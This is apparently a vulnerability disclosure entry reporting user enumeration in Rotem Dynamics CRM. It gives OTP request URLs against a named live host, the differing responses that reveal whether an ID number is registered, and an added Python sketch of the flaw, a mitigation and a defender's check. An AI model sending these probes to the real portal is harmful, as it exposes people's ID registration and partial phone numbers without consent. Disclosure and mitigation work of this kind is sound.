| Title | Rotem Dynamics CRM User / Member Enumeration Vulnerability |
|---|---|
| Description | Rotem CRM is vulnerable, allowing user enumeration via the OTP URI interface. CWE-200: Exposure of Sensitive Information to an Unauthorized Actor; CWE-203: Observable Discrepancy. No version details due to closed source and lack of cooperation. Probably applies to all versions. |

Example:

```
https://rotemcrm.idfwo.org/LandingPages/api/otp/send?id=[ID][ampersand]method=sms
https://rotemcrm.idfwo.org/LandingPages/api/otp/send?id=[ID][ampersand]method=email
```

1. Replace [ID] with the ID number.
2. Replace [ampersand] with the ampersand symbol (prohibited by your vulnerability report form).

Successful response (for this implementation):

```json
{"Status":"Sent OTP","SentTo":"נשלח קוד אישור לטלפון שמספרו: XXXXXXX123"}
```

Unsuccessful response (user not found):

```json
{"Error":"תעודת הזהות לא נמצאה, ניתן ליצור קשר בטלפון 03-6918403"}
```
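As an added illustration (not code from the report or from Rotem CRM), the following Python models the discrepancy between the two responses above and the uniform-response mitigation a defender would apply to the OTP send endpoint; the user directory, ID numbers and message texts are constructed.

```python
"""Added example: observable discrepancy in an OTP send endpoint and its fix."""
import json
import secrets

# Constructed sample directory: ID number -> phone number on file (not real data).
USERS = {"000000018": "0501234123", "000000026": "0529876556"}


def mask_phone(phone: str) -> str:
    """Keep only the last three digits, like the 'SentTo' field in the report."""
    return "X" * (len(phone) - 3) + phone[-3:]


def deliver(phone: str, code: str) -> None:
    """Placeholder for SMS/email delivery; a real handler would send here."""
    return None


def send_otp_vulnerable(user_id: str) -> tuple[int, str]:
    """Behaviour described in the report (CWE-203): the reply differs depending on
    whether the ID exists, and the success branch also leaks part of the phone
    number on file (CWE-200). Returns (HTTP status, JSON body)."""
    phone = USERS.get(user_id)
    if phone is None:
        return 200, json.dumps({"Error": "ID number not found"})
    deliver(phone, secrets.token_hex(3))
    return 200, json.dumps({"Status": "Sent OTP", "SentTo": mask_phone(phone)})


def send_otp_uniform(user_id: str) -> tuple[int, str]:
    """Mitigation: identical status, body and length whether or not the ID is
    registered. The OTP is still delivered only for a known ID, and no part of
    the contact details is echoed back. Per-IP rate limiting belongs in front of
    this handler as well, but is outside this example."""
    phone = USERS.get(user_id)
    if phone is not None:
        deliver(phone, secrets.token_hex(3))
    return 200, json.dumps({"Status": "If the ID is registered, a code has been sent"})


def responses_distinguishable(handler, known_id: str, unknown_id: str) -> bool:
    """Defender's check: can a caller tell a known ID from an unknown one by
    comparing status code, body text or body length of the two replies?"""
    status_a, body_a = handler(known_id)
    status_b, body_b = handler(unknown_id)
    return status_a != status_b or body_a != body_b or len(body_a) != len(body_b)
```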
| User | Anonymous User |
|---|---|
| Submission | 27/06/2023 03:27 PM (3 years ago) |
| Moderation | 06/07/2023 07:36 PM (9 days later) |
| Status | Approved |
| VulDB Entry | 233253 [Rotem Dynamics Rotem CRM up to 20230729 OTP URI Interface send?id=[ID][ampersand]method=sms information disclosure] |
| Points | 17 |